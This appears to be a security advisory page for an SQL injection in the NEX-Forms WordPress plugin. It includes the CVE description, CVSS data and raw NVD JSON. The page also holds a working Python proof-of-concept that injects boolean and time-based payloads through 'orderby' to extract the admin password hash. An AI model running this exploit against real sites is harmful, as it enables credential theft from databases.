Security Vulnerability Report
中文
CVE-2025-10185 CVSS 4.9 MEDIUM

CVE-2025-10185

Published: 2025-10-11 08:15:32
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10185 SQL Injection PoC # Target: NEX-Forms WordPress Plugin <= 9.1.6 # Vulnerable Parameter: orderby in nf_load_form_entries action # Note: Requires authenticated access (Administrator level) import requests # WordPress site URL and authenticated session cookies TARGET_URL = "https://target-wordpress-site.com" COOKIES = { "wordpress_logged_in_[HASH]": "YOUR_AUTH_COOKIE_VALUE", "wordpress_sec_[HASH]": "YOUR_SEC_COOKIE_VALUE" } # WordPress REST API/AJAX nonce (required for authenticated AJAX requests) NONCE = "YOUR_WORDPRESS_NONCE" def exploit_sqli(target_url, cookies, nonce): """ Exploit SQL injection via 'orderby' parameter in nf_load_form_entries action. Uses UNION-based injection to extract sensitive data. """ # The vulnerable AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload: Inject via orderby parameter # Extract WordPress user credentials (user_login, user_pass) payload = ( "(SELECT IF(SUBSTR(user_pass,1,1)=BINARY CHAR(49),1,(SELECT table_name " "FROM information_schema.tables LIMIT 1))) ASC-- -" ) # Alternative UNION-based payload for direct data extraction # payload = "id ASC, (SELECT user_pass FROM wp_users WHERE ID=1) ASC-- -" data = { "action": "nf_load_form_entries", "orderby": payload, "form_id": "1", "_wpnonce": nonce } response = requests.post(ajax_url, data=data, cookies=cookies) if response.status_code == 200: print(f"[+] Response received: {response.text[:500]}") # Parse response to extract sensitive data return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None def time_based_sqli(target_url, cookies, nonce): """ Time-based blind SQL injection variant for data extraction when UNION queries are filtered. """ import time ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Time-based payload to extract admin password hash character by character # SLEEP(5) will cause a 5-second delay if the condition is true payload = ( "(SELECT IF(SUBSTRING((SELECT user_pass FROM wp_users " "WHERE user_login='admin'),1,1)='a',SLEEP(5),0))-- -" ) data = { "action": "nf_load_form_entries", "orderby": payload, "form_id": "1", "_wpnonce": nonce } start_time = time.time() response = requests.post(ajax_url, data=data, cookies=cookies) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] Time-based injection confirmed (delay: {elapsed:.2f}s)") print("[+] First character of admin password hash is 'a'") else: print(f"[-] No delay detected (elapsed: {elapsed:.2f}s)") # Run the exploit if __name__ == "__main__": print("[*] CVE-2025-10185 - NEX-Forms SQL Injection Exploit") print("[*] WARNING: Use only on systems you are authorized to test") exploit_sqli(TARGET_URL, COOKIES, NONCE) # time_based_sqli(TARGET_URL, COOKIES, NONCE)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10185", "sourceIdentifier": "[email protected]", "published": "2025-10-11T08:15:31.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/nex-forms-express-wp-form-builder/tags/9.1.4/includes/classes/class.db.php#2527", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3365585/nex-forms-express-wp-form-builder/trunk/includes/classes/class.db.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e68d47e7-9a42-4a77-aefa-fe130500cbd3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.